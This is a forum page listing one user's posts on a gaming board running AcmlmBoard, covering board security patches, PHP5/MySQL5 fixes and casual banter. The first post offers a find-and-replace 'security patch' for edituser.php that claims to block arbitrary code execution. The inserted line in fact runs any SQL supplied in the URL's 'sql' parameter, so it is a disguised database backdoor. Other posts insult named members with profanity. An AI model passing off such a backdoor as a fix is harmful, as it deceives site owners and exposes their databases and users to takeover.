New link in the top of page "IRC Chat".
Register | Login
Views: 135702272
Main | Memberlist | Active users | Calendar | Last Posts | IRC Chat | Online users
Ranks | FAQ | XPW | Stats | Color Chart | Photo album
11-24-24 11:06 PM
Xeogaming Forums - - Posts by Xkeeper
Pages: 1 2
User Post
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-14-06 08:25 AM, in Holes in ABs Link
Find:
if($_POST[action]=='saveprofile'){

Replace with:
if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){


This should prevent people from executing arbitary code through it


(Last edited by Xkeeper_ on 09-14-06 11:26 AM)
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-14-06 08:30 AM, in Holes in ABs Link
edituser.php.
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-14-06 08:41 AM, in Holes in ABs Link
Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).

Seriously, that's probably the major hole as it ghas no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you.
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-14-06 08:51 AM, in Holes in ABs Link
Would I use it myself if it didn't fix things? Jeez...

Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-14-06 08:55 AM, in Holes in ABs Link
Not off the top of my head, no.
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-17-06 10:59 PM, in ...And the little posters all lived happily ever after. Link
Originally posted by Xeodeus
We need sexy posters like you to post more, to bury the spammage!

(don't ask).

but I like spam!
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 09-17-06 11:02 PM, in Dog the Bounty Hunter arrested Link
I know how it'll turn out.


Ha ha another reality TV show dies.
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 12-03-07 02:33 PM, in fixing things is fun Link
Seems that a few things broke boards on the upgrade to PHP5 and MySQL5... the stuff I added in should fix that.

If there's anything else still broken, just let me know and I can go ahead and try to fix it (depending on how long I have access to the files )

But yeah, the important bits should be working now, at least.
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 12-03-07 02:54 PM, in fixing things is fun Link
Yeah, I heard you guys were having some problems (as everyone on fiftypounds (of trash) is)

register_globals and MySQL5 combine to make them break horribly
(restricted)
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 12-03-07 03:20 PM, in fixing things is fun Link
'quotes' 'are' 'no' 'longer' 'broken'

Erkdog you are a still a fucking moron
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 12-03-07 04:12 PM, in fixing things is fun Link
Originally posted by Thexare Blademoon
Originally posted by Xkeeper_
Erkdog you are a still a fucking moron

Was there ever any doubt?

Thanks, Xk.

I mean, he's gotten *worse* over time.

That's the really amazing part.
(restricted)
Xkeeper









Since: 09-14-06

Since last post: 5914 days
Last activity: 5279 days
Posted on 12-04-07 05:37 PM, in fixing things is fun Link
I see Insectduel hasn't changed any Don't worry, the hate's mutual

Aside from that, if there's one thing that I got out of fixing this place, it's the porn forum!

...




(Kidding, really)
(restricted)
(restricted)
(restricted)
(restricted)
(restricted)
(restricted)
Pages: 1 2
Xeogaming Forums - - Posts by Xkeeper



xeogaming.org

AcmlmBoard 1.92++ r4 Baseline
?2000-2013 Acmlm, Emuz, Blades, Xkeeper, DarkSlaya*, Lord Alexandor*
*Unofficial Updates
Page rendered in 0.124 seconds.
0.033